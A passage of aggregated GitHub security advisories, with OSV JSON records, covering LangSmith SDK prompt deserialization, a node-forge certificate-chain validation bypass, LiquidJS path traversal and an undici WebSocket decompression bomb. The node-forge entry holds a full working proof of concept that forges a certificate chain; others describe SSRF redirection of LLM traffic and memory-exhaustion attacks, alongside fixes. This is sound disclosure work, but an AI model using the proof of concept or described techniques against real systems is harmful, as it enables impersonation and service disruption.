Applications that only pull prompts from their own organization (referenced by name only, without an owner/ prefix) are not affected by the public prompt trust boundary issue described above. However, same-organization prompts carry their own risk. If an attacker gains write access to the organization (for example, through a leaked LANGSMITH_API_KEY or a compromised team member account), they can push a malicious prompt that is pulled and deserialized without any additional warning.
Impact
An attacker who publishes a malicious prompt to LangSmith Hub may be able to affect applications that pull that prompt by owner/name. If the prompt manifest reaches the SDK's deserialization path, the SDK will instantiate the referenced LangChain objects with the attacker-supplied constructor arguments rather than treating the manifest as inert data.
Realistic impacts include:
- Server-side request forgery (SSRF), outbound request redirection, and interception of LLM traffic if a prompt manifest configures an LLM client with an attacker-controlled
base_url, proxy, or equivalent endpoint-setting parameter. In typical deployments, redirected requests may include prompt contents, system prompts, retrieved context, model parameters, provider credentials, or other secrets and may disclose them to the attacker-controlled endpoint. - Prompt injection or behavior manipulation if a manifest embeds attacker-controlled system messages, prompt templates, or model parameters that alter the application's behavior.
- Additional deserialization risk when
include_model=Trueis passed, because this expands the allowlist to partner integration classes. This is not the default, but it materially increases risk when pulling prompts from outside the caller's organization.
Remediation
The LangSmith SDK now blocks pulling public prompts by owner/name by default. Callers must explicitly opt in by passing dangerously_pull_public_prompt=True (Python) or dangerouslyPullPublicPrompt: true (JS/TS) to acknowledge the trust boundary. This flag should only be set after reviewing and trusting the prompt contents, not merely the publishing account.
Upgrade to LangSmith SDK Python >= 0.8.0 or JS/TS >= 0.6.0.
Guidance for prompt pull methods
The prompt pull methods (pull_prompt / pull_prompt_commit in Python, pullPrompt / pullPromptCommit in JS/TS) should be used only with trusted prompts. Do not pull public prompts by owner/name from untrusted or unreviewed sources without understanding that the manifest contents will be deserialized and may affect runtime behavior.
When pulling prompts that include model configuration (include_model=True in Python, includeModel: true in JS/TS), the deserialization allowlist expands to include partner integration classes. Because this mode is not the default and is often unnecessary for third-party prompts, prefer the default (false) when pulling prompts from sources outside your organization.
Avoid passing secrets_from_env=True (Python) when pulling untrusted prompts. This parameter allows prompt manifests to read environment variables during deserialization. Only use it with trusted prompts from your own organization.
Same-organization prompts
Prompts pulled from the caller's own organization (referenced by name only, without an owner/ prefix) are not gated by the new dangerously_pull_public_prompt flag, but they are not inherently safe. If an attacker gains write access to the organization (for example, through a leaked LANGSMITH_API_KEY or a compromised team member account), they can push a malicious prompt that redirects LLM traffic to attacker-controlled infrastructure and may disclose any credentials attached to those requests.
The security of same-organization prompts follows a shared responsibility model. The LangSmith SDK enforces trust boundaries for public prompts pulled from external accounts, but it cannot protect against compromised credentials or accounts within the caller's own organization. Securing API keys, managing team member access, and reviewing prompt contents before production deployment are the responsibility of the organization. Organizations should treat prompts as executable configuration and apply the same review and audit practices they would apply to application code.
Credits
First reported by @Moaaz-0x.
{
"affected": [
{
"package": {
"ecosystem": "PyPI",
"name": "langsmith"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.8.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "langsmith"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.6.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "langchain-classic"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "PyPI",
"name": "langchain"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.3.30"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45134"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-13T15:29:30Z",
"nvd_published_at": "2026-05-27T20:16:38Z",
"severity": "HIGH"
},
"details": "## Description\n\nThe LangSmith SDK\u0027s prompt pull methods (`pull_prompt` / `pull_prompt_commit` in Python, `pullPrompt` / `pullPromptCommit` in JS/TS) fetch and deserialize prompt manifests from the LangSmith Hub. These manifests may contain serialized LangChain objects and model configuration that affect runtime behavior. When pulling a public prompt by `owner/name` identifier, the manifest content is controlled by an external party, but prior versions of the SDK did not distinguish this from pulling a prompt within the caller\u0027s own organization.\n\nPrompt manifests can intentionally configure a model with a custom base URL, default headers, model name, or other constructor arguments. These are supported features, but they also mean the prompt contents should be treated as executable configuration rather than plain text. A prompt can also include serialized LangChain `Runnable` or `PromptTemplate` objects with attacker-controlled constructor kwargs, or secret references that, if `secrets_from_env` is enabled, read environment variables at deserialization time.\nApplications are exposed when all of the following are true:\n\n- The application calls `pull_prompt` or `pull_prompt_commit` (Python) or `pullPrompt` or `pullPromptCommit` (JS/TS) with a public `owner/name` prompt identifier.\n- The prompt was published or modified by an untrusted or compromised account.\n- The application uses the pulled prompt without independently validating its contents.\n\nApplications that only pull prompts from their own organization (referenced by name only, without an `owner/` prefix) are not affected by the public prompt trust boundary issue described above. However, same-organization prompts carry their own risk. If an attacker gains write access to the organization (for example, through a leaked `LANGSMITH_API_KEY` or a compromised team member account), they can push a malicious prompt that is pulled and deserialized without any additional warning.\n\n## Impact\n\nAn attacker who publishes a malicious prompt to LangSmith Hub may be able to affect applications that pull that prompt by `owner/name`. If the prompt manifest reaches the SDK\u0027s deserialization path, the SDK will instantiate the referenced LangChain objects with the attacker-supplied constructor arguments rather than treating the manifest as inert data.\n\nRealistic impacts include:\n\n- Server-side request forgery (SSRF), outbound request redirection, and interception of LLM traffic if a prompt manifest configures an LLM client with an attacker-controlled `base_url`, proxy, or equivalent endpoint-setting parameter. In typical deployments, redirected requests may include prompt contents, system prompts, retrieved context, model parameters, provider credentials, or other secrets and may disclose them to the attacker-controlled endpoint.\n- Prompt injection or behavior manipulation if a manifest embeds attacker-controlled system messages, prompt templates, or model parameters that alter the application\u0027s behavior.\n- Additional deserialization risk when `include_model=True` is passed, because this expands the allowlist to partner integration classes. This is not the default, but it materially increases risk when pulling prompts from outside the caller\u0027s organization.\n\n## Remediation\n\nThe LangSmith SDK now blocks pulling public prompts by `owner/name` by default. Callers must explicitly opt in by passing `dangerously_pull_public_prompt=True` (Python) or `dangerouslyPullPublicPrompt: true` (JS/TS) to acknowledge the trust boundary. This flag should only be set after reviewing and trusting the prompt contents, not merely the publishing account.\n\nUpgrade to LangSmith SDK **Python \u003e= 0.8.0** or **JS/TS \u003e= 0.6.0**.\n\n### Guidance for prompt pull methods\n\nThe prompt pull methods (`pull_prompt` / `pull_prompt_commit` in Python, `pullPrompt` / `pullPromptCommit` in JS/TS) should be used only with trusted prompts. Do not pull public prompts by `owner/name` from untrusted or unreviewed sources without understanding that the manifest contents will be deserialized and may affect runtime behavior.\n\nWhen pulling prompts that include model configuration (`include_model=True` in Python, `includeModel: true` in JS/TS), the deserialization allowlist expands to include partner integration classes. Because this mode is not the default and is often unnecessary for third-party prompts, prefer the default (`false`) when pulling prompts from sources outside your organization.\n\nAvoid passing `secrets_from_env=True` (Python) when pulling untrusted prompts. This parameter allows prompt manifests to read environment variables during deserialization. Only use it with trusted prompts from your own organization.\n\n### Same-organization prompts\n\nPrompts pulled from the caller\u0027s own organization (referenced by name only, without an `owner/` prefix) are not gated by the new `dangerously_pull_public_prompt` flag, but they are not inherently safe. If an attacker gains write access to the organization (for example, through a leaked `LANGSMITH_API_KEY` or a compromised team member account), they can push a malicious prompt that redirects LLM traffic to attacker-controlled infrastructure and may disclose any credentials attached to those requests.\n\nThe security of same-organization prompts follows a shared responsibility model. The LangSmith SDK enforces trust boundaries for public prompts pulled from external accounts, but it cannot protect against compromised credentials or accounts within the caller\u0027s own organization. Securing API keys, managing team member access, and reviewing prompt contents before production deployment are the responsibility of the organization. Organizations should treat prompts as executable configuration and apply the same review and audit practices they would apply to application code.\n\n## Credits\n\nFirst reported by @Moaaz-0x.",
"id": "GHSA-3644-q5cj-c5c7",
"modified": "2026-06-08T23:54:03Z",
"published": "2026-05-13T15:29:30Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/langchain-ai/langsmith-sdk/security/advisories/GHSA-3644-q5cj-c5c7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-45134"
},
{
"type": "PACKAGE",
"url": "https://github.com/langchain-ai/langsmith-sdk"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "LangSmith SDK: Public prompt pull deserializes untrusted manifests without trust boundary warning"
}
GHSA-2328-F5F3-GJ25
Vulnerability from github – Published: 2026-03-26 22:05 – Updated: 2026-03-27 21:51Summary
pki.verifyCertificateChain() does not enforce RFC 5280 basicConstraints requirements when an intermediate certificate lacks both the basicConstraints and keyUsage extensions. This allows any leaf certificate (without these extensions) to act as a CA and sign other certificates, which node-forge will accept as valid.
Technical Details
In lib/x509.js, the verifyCertificateChain() function (around lines 3147-3199) has two conditional checks for CA authorization:
- The
keyUsagecheck (which includes a sub-check requiringbasicConstraintsto be present) is gated onkeyUsageExt !== null - The
basicConstraints.cAcheck is gated onbcExt !== null
When a certificate has neither extension, both checks are skipped entirely. The certificate passes all CA validation and is accepted as a valid intermediate CA.
RFC 5280 Section 6.1.4 step (k) requires:
"If certificate i is a version 3 certificate, verify that the basicConstraints extension is present and that cA is set to TRUE."
The absence of basicConstraints should result in rejection, not acceptance.
Proof of Concept
const forge = require('node-forge');
const pki = forge.pki;
function generateKeyPair() {
return pki.rsa.generateKeyPair({ bits: 2048, e: 0x10001 });
}
console.log('=== node-forge basicConstraints Bypass PoC ===\n');
// 1. Create a legitimate Root CA (self-signed, with basicConstraints cA=true)
const rootKeys = generateKeyPair();
const rootCert = pki.createCertificate();
rootCert.publicKey = rootKeys.publicKey;
rootCert.serialNumber = '01';
rootCert.validity.notBefore = new Date();
rootCert.validity.notAfter = new Date();
rootCert.validity.notAfter.setFullYear(rootCert.validity.notBefore.getFullYear() + 10);
const rootAttrs = [
{ name: 'commonName', value: 'Legitimate Root CA' },
{ name: 'organizationName', value: 'PoC Security Test' }
];
rootCert.setSubject(rootAttrs);
rootCert.setIssuer(rootAttrs);
rootCert.setExtensions([
{ name: 'basicConstraints', cA: true, critical: true },
{ name: 'keyUsage', keyCertSign: true, cRLSign: true, critical: true }
]);
rootCert.sign(rootKeys.privateKey, forge.md.sha256.create());
// 2. Create a "leaf" certificate signed by root — NO basicConstraints, NO keyUsage
// This certificate should NOT be allowed to sign other certificates
const leafKeys = generateKeyPair();
const leafCert = pki.createCertificate();
leafCert.publicKey = leafKeys.publicKey;
leafCert.serialNumber = '02';
leafCert.validity.notBefore = new Date();
leafCert.validity.notAfter = new Date();
leafCert.validity.notAfter.setFullYear(leafCert.validity.notBefore.getFullYear() + 5);
const leafAttrs = [
{ name: 'commonName', value: 'Non-CA Leaf Certificate' },
{ name: 'organizationName', value: 'PoC Security Test' }
];
leafCert.setSubject(leafAttrs);
leafCert.setIssuer(rootAttrs);
// NO basicConstraints extension — NO keyUsage extension
leafCert.sign(rootKeys.privateKey, forge.md.sha256.create());
// 3. Create a "victim" certificate signed by the leaf
// This simulates an attacker using a non-CA cert to forge certificates
const victimKeys = generateKeyPair();
const victimCert = pki.createCertificate();
victimCert.publicKey = victimKeys.publicKey;
victimCert.serialNumber = '03';
victimCert.validity.notBefore = new Date();
victimCert.validity.notAfter = new Date();
victimCert.validity.notAfter.setFullYear(victimCert.validity.notBefore.getFullYear() + 1);
const victimAttrs = [
{ name: 'commonName', value: 'victim.example.com' },
{ name: 'organizationName', value: 'Victim Corp' }
];
victimCert.setSubject(victimAttrs);
victimCert.setIssuer(leafAttrs);
victimCert.sign(leafKeys.privateKey, forge.md.sha256.create());
// 4. Verify the chain: root -> leaf -> victim
const caStore = pki.createCaStore([rootCert]);
try {
const result = pki.verifyCertificateChain(caStore, [victimCert, leafCert]);
console.log('[VULNERABLE] Chain verification SUCCEEDED: ' + result);
console.log(' node-forge accepted a non-CA certificate as an intermediate CA!');
console.log(' This violates RFC 5280 Section 6.1.4.');
} catch (e) {
console.log('[SECURE] Chain verification FAILED (expected): ' + e.message);
}
Results:
- Certificate with NO extensions: ACCEPTED as CA (vulnerable — violates RFC 5280)
- Certificate with basicConstraints.cA=false: correctly rejected
- Certificate with keyUsage (no keyCertSign): correctly rejected
- Proper intermediate CA (control): correctly accepted
Attack Scenario
An attacker who obtains any valid leaf certificate (e.g., a regular TLS certificate for attacker.com) that lacks basicConstraints and keyUsage extensions can use it to sign certificates for ANY domain. Any application using node-forge's verifyCertificateChain() will accept the forged chain.
This affects applications using node-forge for: - Custom PKI / certificate pinning implementations - S/MIME / PKCS#7 signature verification - IoT device certificate validation - Any non-native-TLS certificate chain verification
CVE Precedent
This is the same vulnerability class as: - CVE-2014-0092 (GnuTLS) — certificate verification bypass - CVE-2015-1793 (OpenSSL) — alternative chain verification bypass - CVE-2020-0601 (Windows CryptoAPI) — crafted certificate acceptance
Not a Duplicate
This is distinct from: - CVE-2025-12816 (ASN.1 parser desynchronization — different code path) - CVE-2025-66030/66031 (DoS and integer overflow — different issue class) - GitHub issue #1049 (null subject/issuer — different malformation)
Suggested Fix
Add an explicit check for absent basicConstraints on non-leaf certificates:
// After the keyUsage check block, BEFORE the cA check:
if(error === null && bcExt === null) {
error = {
message: 'Certificate is missing basicConstraints extension and cannot be used as a CA.',
error: pki.certificateError.bad_certificate
};
}
Disclosure Timeline
- 2026-03-10: Report submitted via GitHub Security Advisory
- 2026-06-08: 90-day coordinated disclosure deadline
Credits
Discovered and reported by Doruk Tan Ozturk (@peaktwilight) — doruk.ch
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.3.3"
},
"package": {
"ecosystem": "npm",
"name": "node-forge"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.4.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-33896"
],
"database_specific": {
"cwe_ids": [
"CWE-295"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-26T22:05:43Z",
"nvd_published_at": "2026-03-27T21:17:26Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`pki.verifyCertificateChain()` does not enforce RFC 5280 basicConstraints requirements when an intermediate certificate lacks both the `basicConstraints` and `keyUsage` extensions. This allows any leaf certificate (without these extensions) to act as a CA and sign other certificates, which node-forge will accept as valid.\n\n## Technical Details\n\nIn `lib/x509.js`, the `verifyCertificateChain()` function (around lines 3147-3199) has two conditional checks for CA authorization:\n\n1. The `keyUsage` check (which includes a sub-check requiring `basicConstraints` to be present) is gated on `keyUsageExt !== null`\n2. The `basicConstraints.cA` check is gated on `bcExt !== null`\n\nWhen a certificate has **neither** extension, both checks are skipped entirely. The certificate passes all CA validation and is accepted as a valid intermediate CA.\n\n**RFC 5280 Section 6.1.4 step (k) requires:**\n\u003e \"If certificate i is a version 3 certificate, verify that the basicConstraints extension is present and that cA is set to TRUE.\"\n\nThe absence of `basicConstraints` should result in rejection, not acceptance.\n\n## Proof of Concept\n\n```javascript\nconst forge = require(\u0027node-forge\u0027);\nconst pki = forge.pki;\n\nfunction generateKeyPair() {\n return pki.rsa.generateKeyPair({ bits: 2048, e: 0x10001 });\n}\n\nconsole.log(\u0027=== node-forge basicConstraints Bypass PoC ===\\n\u0027);\n\n// 1. Create a legitimate Root CA (self-signed, with basicConstraints cA=true)\nconst rootKeys = generateKeyPair();\nconst rootCert = pki.createCertificate();\nrootCert.publicKey = rootKeys.publicKey;\nrootCert.serialNumber = \u002701\u0027;\nrootCert.validity.notBefore = new Date();\nrootCert.validity.notAfter = new Date();\nrootCert.validity.notAfter.setFullYear(rootCert.validity.notBefore.getFullYear() + 10);\n\nconst rootAttrs = [\n { name: \u0027commonName\u0027, value: \u0027Legitimate Root CA\u0027 },\n { name: \u0027organizationName\u0027, value: \u0027PoC Security Test\u0027 }\n];\nrootCert.setSubject(rootAttrs);\nrootCert.setIssuer(rootAttrs);\nrootCert.setExtensions([\n { name: \u0027basicConstraints\u0027, cA: true, critical: true },\n { name: \u0027keyUsage\u0027, keyCertSign: true, cRLSign: true, critical: true }\n]);\nrootCert.sign(rootKeys.privateKey, forge.md.sha256.create());\n\n// 2. Create a \"leaf\" certificate signed by root \u2014 NO basicConstraints, NO keyUsage\n// This certificate should NOT be allowed to sign other certificates\nconst leafKeys = generateKeyPair();\nconst leafCert = pki.createCertificate();\nleafCert.publicKey = leafKeys.publicKey;\nleafCert.serialNumber = \u002702\u0027;\nleafCert.validity.notBefore = new Date();\nleafCert.validity.notAfter = new Date();\nleafCert.validity.notAfter.setFullYear(leafCert.validity.notBefore.getFullYear() + 5);\n\nconst leafAttrs = [\n { name: \u0027commonName\u0027, value: \u0027Non-CA Leaf Certificate\u0027 },\n { name: \u0027organizationName\u0027, value: \u0027PoC Security Test\u0027 }\n];\nleafCert.setSubject(leafAttrs);\nleafCert.setIssuer(rootAttrs);\n// NO basicConstraints extension \u2014 NO keyUsage extension\nleafCert.sign(rootKeys.privateKey, forge.md.sha256.create());\n\n// 3. Create a \"victim\" certificate signed by the leaf\n// This simulates an attacker using a non-CA cert to forge certificates\nconst victimKeys = generateKeyPair();\nconst victimCert = pki.createCertificate();\nvictimCert.publicKey = victimKeys.publicKey;\nvictimCert.serialNumber = \u002703\u0027;\nvictimCert.validity.notBefore = new Date();\nvictimCert.validity.notAfter = new Date();\nvictimCert.validity.notAfter.setFullYear(victimCert.validity.notBefore.getFullYear() + 1);\n\nconst victimAttrs = [\n { name: \u0027commonName\u0027, value: \u0027victim.example.com\u0027 },\n { name: \u0027organizationName\u0027, value: \u0027Victim Corp\u0027 }\n];\nvictimCert.setSubject(victimAttrs);\nvictimCert.setIssuer(leafAttrs);\nvictimCert.sign(leafKeys.privateKey, forge.md.sha256.create());\n\n// 4. Verify the chain: root -\u003e leaf -\u003e victim\nconst caStore = pki.createCaStore([rootCert]);\n\ntry {\n const result = pki.verifyCertificateChain(caStore, [victimCert, leafCert]);\n console.log(\u0027[VULNERABLE] Chain verification SUCCEEDED: \u0027 + result);\n console.log(\u0027 node-forge accepted a non-CA certificate as an intermediate CA!\u0027);\n console.log(\u0027 This violates RFC 5280 Section 6.1.4.\u0027);\n} catch (e) {\n console.log(\u0027[SECURE] Chain verification FAILED (expected): \u0027 + e.message);\n}\n```\n\n**Results:**\n- Certificate with NO extensions: **ACCEPTED as CA** (vulnerable \u2014 violates RFC 5280)\n- Certificate with `basicConstraints.cA=false`: correctly rejected\n- Certificate with `keyUsage` (no `keyCertSign`): correctly rejected\n- Proper intermediate CA (control): correctly accepted\n\n## Attack Scenario\n\nAn attacker who obtains any valid leaf certificate (e.g., a regular TLS certificate for `attacker.com`) that lacks `basicConstraints` and `keyUsage` extensions can use it to sign certificates for ANY domain. Any application using node-forge\u0027s `verifyCertificateChain()` will accept the forged chain.\n\nThis affects applications using node-forge for:\n- Custom PKI / certificate pinning implementations\n- S/MIME / PKCS#7 signature verification\n- IoT device certificate validation\n- Any non-native-TLS certificate chain verification\n\n## CVE Precedent\n\nThis is the same vulnerability class as:\n- **CVE-2014-0092** (GnuTLS) \u2014 certificate verification bypass\n- **CVE-2015-1793** (OpenSSL) \u2014 alternative chain verification bypass\n- **CVE-2020-0601** (Windows CryptoAPI) \u2014 crafted certificate acceptance\n\n## Not a Duplicate\n\nThis is distinct from:\n- CVE-2025-12816 (ASN.1 parser desynchronization \u2014 different code path)\n- CVE-2025-66030/66031 (DoS and integer overflow \u2014 different issue class)\n- GitHub issue #1049 (null subject/issuer \u2014 different malformation)\n\n## Suggested Fix\n\nAdd an explicit check for absent `basicConstraints` on non-leaf certificates:\n\n```javascript\n// After the keyUsage check block, BEFORE the cA check:\nif(error === null \u0026\u0026 bcExt === null) {\n error = {\n message: \u0027Certificate is missing basicConstraints extension and cannot be used as a CA.\u0027,\n error: pki.certificateError.bad_certificate\n };\n}\n```\n\n## Disclosure Timeline\n\n- 2026-03-10: Report submitted via GitHub Security Advisory\n- 2026-06-08: 90-day coordinated disclosure deadline\n\n## Credits\n\nDiscovered and reported by Doruk Tan Ozturk ([@peaktwilight](https://github.com/peaktwilight)) \u2014 [doruk.ch](https://doruk.ch)",
"id": "GHSA-2328-f5f3-gj25",
"modified": "2026-03-27T21:51:17Z",
"published": "2026-03-26T22:05:43Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/security/advisories/GHSA-2328-f5f3-gj25"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33896"
},
{
"type": "WEB",
"url": "https://github.com/digitalbazaar/forge/commit/2e492832fb25227e6b647cbe1ac981c123171e90"
},
{
"type": "PACKAGE",
"url": "https://github.com/digitalbazaar/forge"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"type": "CVSS_V3"
}
],
"summary": "Forge has a basicConstraints bypass in its certificate chain verification (RFC 5280 violation)"
}
GHSA-WMFP-5Q7X-987X
Vulnerability from github – Published: 2026-03-10 01:04 – Updated: 2026-03-12 14:25Impact
The layout, render, and include tags allow arbitrary file access via absolute paths (either as string literals or through Liquid variables, the latter require dynamicPartials: true, which is the default). This poses a security risk when malicious users are allowed to control the template content or specify the filepath to be included as a Liquid variable.
Patches
The root cause is LiquidJS allows require.resolve() as fallback but doesn't limit the directories it can resolve to. The issue is fixed via #855 and published version 10.25.0 on npm.
Workarounds
Change the files in build time
In build time, through Shell script or Webpack string-replace-loader, change the file content of correxponding file (depending on your package type, for CommonJS it's dist/liquid.node.js) under dist/,
if (fs.fallback !== undefined) {
const filepath = fs.fallback(file)
- if (filepath !== undefined) yield filepath
+ if (filepath !== undefined) {
+ for (const dir of dirs) {
+ if (!enforceRoot || this.contains(dir, filepath)) {
+ yield filepath
+ break
+ }
+ }
}
}
Overriding by fs LiquidJS option
Adding a fs option to override the default fs implementation:
const { statSync, readFileSync, promises: { stat, readFile } } = require('fs')
const { resolve, extname, dirname, sep } = require('path')
const fs = {
exists: async (fp) => { try { await stat(fp); return true; } catch { return false } },
existsSync: (fp) => { try { statSync(fp); return true } catch { return false } },
resolve: (root, file, ext) => resolve(root, file + (extname(file) ? '' : ext)),
contains: (root, file) => {
const r = resolve(root)
return file.startsWith(r.endsWith(sep) ? r : r + sep)
},
readFile: (fp) => readFile(fp, 'utf8'),
readFileSync: (fp) => readFileSync(fp, 'utf8'),
fallback: () => undefined,
dirname,
sep
};
const engine = new Liquid({ fs })
References
Discussions: https://github.com/harttle/liquidjs/pull/851 Code fix: https://github.com/harttle/liquidjs/pull/855
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "liquidjs"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "10.25.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-30952"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-10T01:04:34Z",
"nvd_published_at": "2026-03-10T21:16:48Z",
"severity": "HIGH"
},
"details": "### Impact\nThe `layout`, `render`, and `include` tags allow arbitrary file access via absolute paths (either as string literals or through Liquid variables, the latter require `dynamicPartials: true`, which is the default). This poses a security risk when malicious users are allowed to control the template content or specify the filepath to be included as a Liquid variable.\n\n### Patches\nThe root cause is LiquidJS allows `require.resolve()` as fallback but doesn\u0027t limit the directories it can resolve to. The issue is fixed via [#855](https://github.com/harttle/liquidjs/pull/855) and published version 10.25.0 on npm.\n\n### Workarounds\n#### Change the files in build time\nIn build time, through Shell script or Webpack `string-replace-loader`, change the file content of correxponding file (depending on your package `type`, for CommonJS it\u0027s `dist/liquid.node.js`) under `dist/`, \n\n```diff\n if (fs.fallback !== undefined) {\n const filepath = fs.fallback(file)\n- if (filepath !== undefined) yield filepath\n+ if (filepath !== undefined) {\n+ for (const dir of dirs) {\n+ if (!enforceRoot || this.contains(dir, filepath)) {\n+ yield filepath\n+ break\n+ }\n+ }\n }\n }\n```\n\n#### Overriding by `fs` LiquidJS option\nAdding a [`fs` option](https://liquidjs.com/api/interfaces/FS.html) to override the [default `fs` implementation](https://github.com/harttle/liquidjs/blob/1b85fdaa9c535021f7030a239a64003af26d31b5/src/fs/fs-impl.ts#L36-L40):\n\n```javascript\nconst { statSync, readFileSync, promises: { stat, readFile } } = require(\u0027fs\u0027)\nconst { resolve, extname, dirname, sep } = require(\u0027path\u0027)\n\nconst fs = {\n exists: async (fp) =\u003e { try { await stat(fp); return true; } catch { return false } },\n existsSync: (fp) =\u003e { try { statSync(fp); return true } catch { return false } },\n resolve: (root, file, ext) =\u003e resolve(root, file + (extname(file) ? \u0027\u0027 : ext)),\n contains: (root, file) =\u003e {\n const r = resolve(root)\n return file.startsWith(r.endsWith(sep) ? r : r + sep)\n },\n readFile: (fp) =\u003e readFile(fp, \u0027utf8\u0027),\n readFileSync: (fp) =\u003e readFileSync(fp, \u0027utf8\u0027),\n fallback: () =\u003e undefined,\n dirname,\n sep\n};\n\nconst engine = new Liquid({ fs })\n```\n\n### References\nDiscussions: https://github.com/harttle/liquidjs/pull/851\nCode fix: https://github.com/harttle/liquidjs/pull/855",
"id": "GHSA-wmfp-5q7x-987x",
"modified": "2026-03-12T14:25:23Z",
"published": "2026-03-10T01:04:34Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/harttle/liquidjs/security/advisories/GHSA-wmfp-5q7x-987x"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30952"
},
{
"type": "WEB",
"url": "https://github.com/harttle/liquidjs/pull/851"
},
{
"type": "WEB",
"url": "https://github.com/harttle/liquidjs/pull/855"
},
{
"type": "WEB",
"url": "https://github.com/harttle/liquidjs/commit/3cd024d652dc883c46307581e979fe32302adbac"
},
{
"type": "PACKAGE",
"url": "https://github.com/harttle/liquidjs"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "liquidjs has a path traversal fallback vulnerability"
}
GHSA-VRM6-8VPV-QV8Q
Vulnerability from github – Published: 2026-03-13 20:41 – Updated: 2026-03-13 20:41Description
The undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a "decompression bomb") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive.
The vulnerability exists in the PerMessageDeflate.decompress() method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.
Impact
- Remote denial of service against any Node.js application using undici's WebSocket client
- A single compressed WebSocket frame of ~6 MB can decompress to ~1 GB or more
- Memory exhaustion occurs in native/external memory, bypassing V8 heap limits
- No application-level mitigation is possible as decompression occurs before message delivery
Patches
Users should upgrade to fixed versions.
Workarounds
No workaround are possible.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "undici"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "6.24.0"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "npm",
"name": "undici"
},
"ranges": [
{
"events": [
{
"introduced": "7.0.0"
},
{
"fixed": "7.24.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-1526"
],
"database_specific": {
"cwe_ids": [
"CWE-409"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-13T20:41:56Z",
"nvd_published_at": "2026-03-12T21:16:23Z",
"severity": "HIGH"
},
"details": "## Description\n\nThe undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a \"decompression bomb\") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive.\n\nThe vulnerability exists in the `PerMessageDeflate.decompress()` method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.\n\n## Impact\n\n- Remote denial of service against any Node.js application using undici\u0027s WebSocket client\n- A single compressed WebSocket frame of ~6 MB can decompress to ~1 GB or more\n- Memory exhaustion occurs in native/external memory, bypassing V8 heap limits\n- No application-level mitigation is possible as decompression occurs before message delivery\n\n### Patches\n\nUsers should upgrade to fixed versions.\n\n### Workarounds\n\nNo workaround are possible.",
"id": "GHSA-vrm6-8vpv-qv8q",
"modified": "2026-03-13T20:41:56Z",
"published": "2026-03-13T20:41:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/nodejs/undici/security/advisories/GHSA-vrm6-8vpv-qv8q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1526"
},
{
"type": "WEB",
"url": "https://hackerone.com/reports/3481206"
},
{
"type": "WEB",
"url": "https://cna.openjsf.org/security-advisories.html"
},
{
"type": "WEB",
"url": "https://datatracker.ietf.org/doc/html/rfc7692"
},
{
"type": "PACKAGE",
"url": "https://github.com/nodejs/undici"
},
{
"type": "WEB",
"url": "https://owasp.org/www-community/attacks/Denial_of_Service"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "Undici has Unbounded Memory Consumption in WebSocket permessage-deflate Decompression"
}
